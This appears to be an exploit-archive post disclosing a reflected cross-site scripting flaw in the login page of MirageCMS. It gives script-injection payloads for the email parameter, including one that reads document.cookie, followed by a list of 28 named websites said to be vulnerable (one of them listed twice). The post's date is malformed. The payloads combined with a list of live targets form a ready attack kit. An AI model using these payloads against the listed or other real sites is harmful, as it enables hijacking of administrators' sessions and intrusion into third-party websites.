Home / exploitsPDF  

MirageCMS Content Management System - Reflected XSS.

Posted on 30 November -0001

<HTML><HEAD><TITLE>MirageCMS (Content Management System) - Reflected XSS.</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Overview - All the versions of MirageCMS are vulnerable to a reflected XSS, The attacker can inject JavaScript to email parameter in a login page. More than 28 websites are vulnerable. POC - www.miragecms.com/admin/login "><script>alert(1);</script> "><script>alert(document.cookie);</script> all the vulnerable websites: 1. http://www.stgweb.com 2. http://www.perot4u.co.il 3. http://www.svsystems.co.il 4. http://www.mertens-hoffman.co.il 5. http://www.discreet-f.co.il 6. http://www.justeyefashion.com 7. http://www.daniel-matat.co.il 8. http://www.the-d.co.il 9. https://www.kozicorporatehousing.com 10. http://www.control-towers.com 11. http://www.tikrot.co.il 12. http://www.talimbar.com 13. http://www.polyron.co.il 14. http://www.hezidean.co.il 15. http://www.udishor.com 16. http://www.mayevsky.co.il 17. http://www.veksler.co.il 18. http://www.egm.co.il 19. http://www.etgar-siud.com 20. http://www.tel-raz.co.il 21. http://www.nuritbublil.co.il 22. http://www.3access.net 23. http://www.etgar-hr.com 24. http://www.teritory.co.il 25. http://www.teritory.co.il 26. http://www.ybendror.com 27. http://www.woops.co.il 28. http://www.portcafe.co.il </BODY></HTML>

 

TOP